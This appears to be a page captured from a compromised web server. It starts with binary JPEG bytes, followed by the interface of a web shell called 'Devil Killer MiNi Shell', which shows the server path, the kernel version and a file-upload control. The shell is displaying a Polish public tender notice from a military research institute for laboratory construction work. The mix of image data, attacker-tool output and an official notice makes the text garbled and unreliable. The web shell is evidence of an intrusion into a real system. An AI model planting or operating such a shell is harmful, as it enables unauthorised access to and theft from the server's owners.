JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220216/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220216/0005853401-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Inwestycja budowlana pn.: LABORATORIUM - rozbudowa, nadbudowa <br/>i przebudowa budynku oraz zmiana sposobu użytkowania części pomieszczeń w budynku biurowo- laboratoryjnym nr 80 na terenie WITU ... </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">WOJSKOWY INSTYTUT TECHNICZNY UZBROJENIA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 010153990</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Prymasa Stefana Wyszyńskiego 7</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Zielonka</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">05-220</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL912 - Warszawski wschodni</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">witu@witu.mil.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.witu.mil.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Instytut Badawczy </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Inwestycja budowlana pn.: LABORATORIUM - rozbudowa, nadbudowa <br/>i przebudowa budynku oraz zmiana sposobu użytkowania części pomieszczeń w budynku biurowo- laboratoryjnym nr 80 na terenie WITU ... </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-42b29ce1-8efb-11ec-9bc1-c2db95d08897</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00058534</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-02-16</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/witu <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.3.) Informacje na temat sposobu udostępnienia zastrzeżonych dokumentów zamówienia</h3> Dokumentacja techniczna: projekt architektoniczno-budowlany, projekty techniczne, Specyfikacje Techniczne Wykonania i Odbioru Robót ze względu na poufny charakter będą dostępne do pobrania z serwera WITU.<br/>Wykonawca jest zobowiązany zgłosić się do Zamawiającego przy użyciu środków komunikacji<br/>elektronicznej, tj. „Platformy Zakupowej&#39; dostępnej pod adresem<br/>https://platformazakupowa.pl/pn/witu za pomocą formularza „Wyślij wiadomość do<br/>zamawiającego” w celu możliwości czasowego pobrania dokumentacji z serwera po uprzednim<br/>otrzymaniu hasła na numer telefonu komórkowego podanym Oświadczeniu o zachowaniu<br/>poufności – załącznik nr 2. Zgłoszenie wspomniane powyżej powinno zawierać, dane firmy<br/>zgłaszającej oraz wypełnione i złożone pod rygorem nieważności w formie elektronicznej lub w<br/>postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym przez osoby<br/>upoważnione do tych czynności „Oświadczenie o zachowaniu poufności” – Załącznik nr 2 do<br/>Opisu przedmiotu zamówienia. Zamawiający po otrzymaniu zgłoszenia prześle informację do<br/>Wykonawcy o sposobie pobrania powyższej dokumentacji.<br/>Wraz z oświadczeniem o poufności należy przesłać :<br/>1) w przypadku przedsiębiorców wpisanych do KRS – odpis z KRS;<br/>2) w przypadku osób fizycznych prowadzących działalność gospodarczą – wydruk zaświadczenia CEIDG;<br/>3) w przypadku innych podmiotów – kopia odpisu z właściwego rejestru;<br/>4) oryginał pełnomocnictwa (jeżeli niniejsze oświadczenie podpisane zostanie przez pełnomocnika) - złożone pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym przez osoby upoważnione do tych czynności.<br/>Wykonawca przed złożeniem oferty zobowiązany jest do zapoznania się<br/>z dokumentacją techniczną. <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/witu</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.<br/>Komunikacja między Zamawiającym a Wykonawcami w niniejszym postępowaniu odbywa się przy<br/>użyciu środków komunikacji elektronicznej, tj. „Platformy Zakupowej&#39; dostępnej pod adresem<br/>https://platformazakupowa.pl/pn/witu (dalej: „Platforma Zakupowa&#34;).<br/>2. Komunikacja między Zamawiającym a Wykonawcami, w tym wszelkie oświadczenia, wnioski,<br/>zawiadomienia, odpowiedzi na pytania oraz informacje, przekazywane są w formie elektronicznej za<br/>pośrednictwem Platformy i formularza „Wyślij wiadomość” znajdującego się na stronie danego<br/>postępowania. Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz informacji<br/>przyjmuje się datę ich przesłania za pośrednictwem Platformy poprzez kliknięcie przycisku „Wyślij<br/>wiadomość”, po których pojawi się komunikat, że wiadomość została wysłana do Zamawiającego.<br/>Wyjaśnienia/zmiany/odpowiedzi w zakresie dokumentacji technicznej mające charakter poufny<br/>„tajemnica przedsiębiorstwa” – będą przekazywane wyłącznie wykonawcom, którzy podpisali<br/>oświadczenie o zachowaniu poufności.<br/>3. Zamawiający będzie przekazywał Wykonawcom informacje w formie elektronicznej za<br/>pośrednictwem Platformy. Informacje dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany<br/>terminu składania i otwarcia ofert Zamawiający będzie zamieszczał na Platformie w sekcji<br/>“Komunikaty” – dotyczy części jawnej postępowania. Korespondencja, której zgodnie z<br/>obowiązującymi przepisami adresatem jest konkretny Wykonawca, będzie przekazywana w formie<br/>elektronicznej za pośrednictwem Platformy do konkretnego Wykonawcy.<br/>4.W przypadku przekazywania w postępowaniu dokumentu elektronicznego w formacie poddającym<br/>dane kompresji, opatrzenie pliku zawierającego skompresowane dokumenty kwalifikowanym podpisem<br/>elektronicznym, podpisem zaufanym lub podpisem osobistym, jest równoznaczne z opatrzeniem<br/>wszystkich dokumentów zawartych w tym pliku odpowiednio kwalifikowanym podpisem elektronicznym,<br/>podpisem zaufanym lub podpisem osobistym.<br/>5. Sposób sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów<br/>elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia<br/>publicznego (dalej, jako „Rozporządzenie&#34;) określa niezbędne wymagania sprzętowo - aplikacyjne<br/>umożliwiające pracę na Platformie, tj.:<br/>a) Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>b) Komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV<br/>2GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10.4,<br/>Linux, lub ich nowsze wersje;<br/>c) Zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer<br/>minimalnie wersja 10.0.,<br/>d) Włączona obsługa JavaScript;<br/>e) Zainstalowany program Adobe Acrobat Reader lub inny obsługujący pliki w formacie pdf;<br/>f) Platforma działa według standardu przyjętego w komunikacji sieciowej - kodowanie UTF8;<br/>6. Zamawiający określa dopuszczalne formaty przesyłanych danych, tj. plików o wielkości do 150 MB.<br/>Zalecany format: .pdf.<br/>7. Zamawiający, zgodnie z Rozporządzeniem w sprawie środków komunikacji, określa informacje na<br/>temat kodowania i czasu odbioru danych, tj.:<br/>a) Plik załączony przez Wykonawcę na Platformie Zakupowej i zapisany nie jest widoczny dla<br/>Zamawiającego, gdyż jest w systemie jako zaszyfrowany. Możliwość otworzenia pliku dostępna jest<br/>dopiero po odszyfrowaniu przez system, co następuje po terminie otwarcia ofert,<br/>b) Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę<br/>oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera<br/>synchronizowanego z zegarem Głównego Urzędu Miar.<br/>8. Zamawiający, zgodnie z Rozporządzeniem w sprawie środków komunikacji, określa dopuszczalny<br/>format kwalifikowanego podpisu elektronicznego jako:<br/>a) dokumenty w formacie .pdf zaleca się podpisywać formatem PAdES;<br/>b) dopuszcza się podpisanie dokumentów w formacie innym niż .pdf, wtedy<br/>zaleca się użyć formatu XAdES.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Określono w Rozdziale XIX SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZPR/1/22/D8/L/16/004/03</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest:<br/>1) rozbudowa, nadbudowa i przebudowa budynku oraz zmiana sposobu użytkowania części pomieszczeń w budynku biurowo- laboratoryjnym nr 80 na terenie Wojskowego Instytutu Technicznego Uzbrojenia przy ul. Prymasa Stefana Wyszyńskiego 7 w Zielonce wraz z zagospodarowaniem terenu oraz niezbędnymi instalacjami zewnętrznymi i wewnętrznymi oraz:<br/>a) sporządzeniem i przekazaniem dokumentacji powykonawczej;<br/>b) przeprowadzeniem szkoleń dla wyznaczonych pracowników Zamawiającego w zakresie i na<br/>zasadach określonych w pkt 4 Opisu Przedmiotu Zamówienia;<br/>c) uzyskaniem i przekazaniem Zamawiającemu ostatecznej/prawomocnej decyzji pozwolenie na<br/>użytkowanie, a także innych dokumentów wskazanych w Opisie Przedmiotu Zamówienia;<br/>2) świadczenie usług serwisowych i konserwacyjnych.<br/>2. Szczegółowy opis przedmiotu zamówienia określony został w:<br/>1) dokumentacji projektowej;<br/>2) Specyfikacji Technicznej Wykonania i Odbioru Robót (STWiOR);<br/>3) decyzji o pozwoleniu na budowę nr 804/SAAB/2021 z dnia 10.11.2021 r;<br/>4) Opisie Przedmiotu Zamówienia stanowiącym załącznik nr 1 do umowy;<br/>5) Dokumentacja kosztorysowa – przedmiary robót stanowią załącznik do SWZ – Załącznik Nr 2<br/>(obejmuje 13 branż).<br/>2.Dokumentacja techniczna: projekt architektoniczno-budowlany, projekty techniczne,<br/>Specyfikacje Techniczne Wykonania i Odbioru Robót ze względu na poufny charakter będą<br/>dostępne do pobrania z serwera WITU. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-10-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">95</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">gwarancja jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunek sytuacji ekonomicznej lub finansowej,<br/>a)	Warunek Zamawiający uzna za spełniony jeżeli Wykonawca wykaże, informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową na min. 6 000 000,00 PLN (w okresie nie wcześniejszym niż 3 miesiąc przed jej złożeniem).<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, powyższy warunek może zostać spełniony przez jednego wykonawcę lub łącznie przez wszystkich wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>Warunek zdolności technicznej lub zawodowej.<br/>a)	dotyczącej wykonawcy<br/>Za spełniających warunek w powyższym zakresie, Zamawiający uzna Wykonawców, którzy wykażą, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonali co najmniej dwie roboty budowlane o podobnym charakterze, odpowiadającą przedmiotowi zamówienia polegającą na budowie lub przebudowie lub rozbudowie lub nadbudowie budynku użyteczności publicznej w zakresie wielobranżowym (uwzględniające branżę budowlaną, konstrukcyjną, sanitarną, elektryczną i teletechniczną), zawierające znaczące roboty konstrukcyjne takie jak np. wykonanie nowego stropu, ław fundamentowych, podbicia istniejących ław fundamentowych itp. o wartości nie mniejszej niż 6 000 000,00 zł brutto każda, wraz z podaniem ich rodzaju, wartości, przedmiotu, daty i miejsca wykonania oraz podmiotu, na rzecz którego roboty te (zamówienia/umowy) zostały wykonane, oraz załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane.<br/>Zamawiający zastrzega, że w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, warunek nie podlega sumowaniu, tj. jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia musi wykazać się całym wymaganym doświadczeniem powyżej (warunek nie będzie spełniony, jeżeli wszyscy wykonawcy wspólnie ubiegający się o udzielenie zamówienia w sumie wykażą się wymaganym doświadczeniem, ale żaden z nich indywidualnie nie wykazał się całym wymaganym doświadczeniem).<br/><br/>Uwaga<br/> W przypadku dostarczenia przez Wykonawców dokumentów dotyczących warunków udziału w postępowaniu, w których wartości zostały podane w walutach obcych, zamawiający, w celu oceny spełnienia ww. warunku, dokona przeliczenia tych wartości wg. kursu z dnia opublikowania ogłoszenia o zamówieniu, a jeżeli w tym dniu nie publikowano kursu tej waluty – według ostatniego średniego kursu NBP przed dniem publikacji ogłoszenia o zamówieniu na podstawie Tabeli kursów średnich NBP publikowanych na stronie internetowej: http://www.nbp.pl/home.aspx?c=/ascx/archa.ascx<br/><br/>b)	dotyczącej osób:<br/>Wykonawca musi wykazać osoby, które będą skierowane przez Wykonawcę do realizacji zamówienia publicznego, legitymujące się doświadczeniem i kwalifikacjami zawodowymi odpowiednimi do funkcji, jakie zostaną im powierzone:<br/>1)	Co najmniej 1 osobę posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń oraz wpis do właściwej izby inżynierów budownictwa, opłaconą składkę OC oraz posiadającą minimum 10 letnie doświadczenie zawodowe; <br/>2)	Co najmniej 1 osobę posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń oraz wpis do właściwej izby inżynierów budownictwa, opłaconą składkę OC oraz posiadającą minimum 5 letnie doświadczenie zawodowe;<br/>3)	Co najmniej 1 osobę posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń oraz wpis do właściwej izby inżynierów budownictwa, opłaconą składkę OC oraz posiadającą minimum 5 letnie doświadczenie zawodowe;<br/>4)	Co najmniej 1 osobę posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności inżynieryjnej drogowej bez ograniczeń lub w ograniczonym zakresie oraz wpis do właściwej izby inżynierów budownictwa oraz opłaconą składkę OC;<br/>5)	Co najmniej 1 osobę posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności inżynieryjnej telekomunikacyjnej bez ograniczeń lub w ograniczonym zakresie oraz wpis do właściwej izby inżynierów budownictwa oraz opłaconą składkę OC; <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego. że wykonawca nie zalega z opłacaniem podatków i <br/>opłat, w zakresie 109 ust. 1 pkt 1 ustawy, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem podatków lub opłat wraz z zaświadczeniem zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem terminu składania ofert wykonawca dokonał płatności należnych podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności;<br/><br/>2.	Zaświadczenia albo innego dokumentu właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że wykonawca nie zalega <br/>z opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie <br/>art. 109 ust. 1 pkt 1 ustawy, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne wraz z zaświadczeniem albo innym dokumentem zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem terminu składania ofert wykonawca dokonał płatności należnych składek na ubezpieczenia społeczne lub zdrowotne wraz odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności;<br/>3.	odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>4.	oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 ze zm.), z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej. Wzór oświadczenia stanowi Załącznik nr 4 do SWZ.<br/>5.	oświadczenie wykonawcy o aktualności informacji zawartych <br/>w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy, w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego, o których mowa w:<br/>1)	art. 108 ust. 1 pkt 3 ustawy,<br/>2)	art. 108 ust. 1 pkt 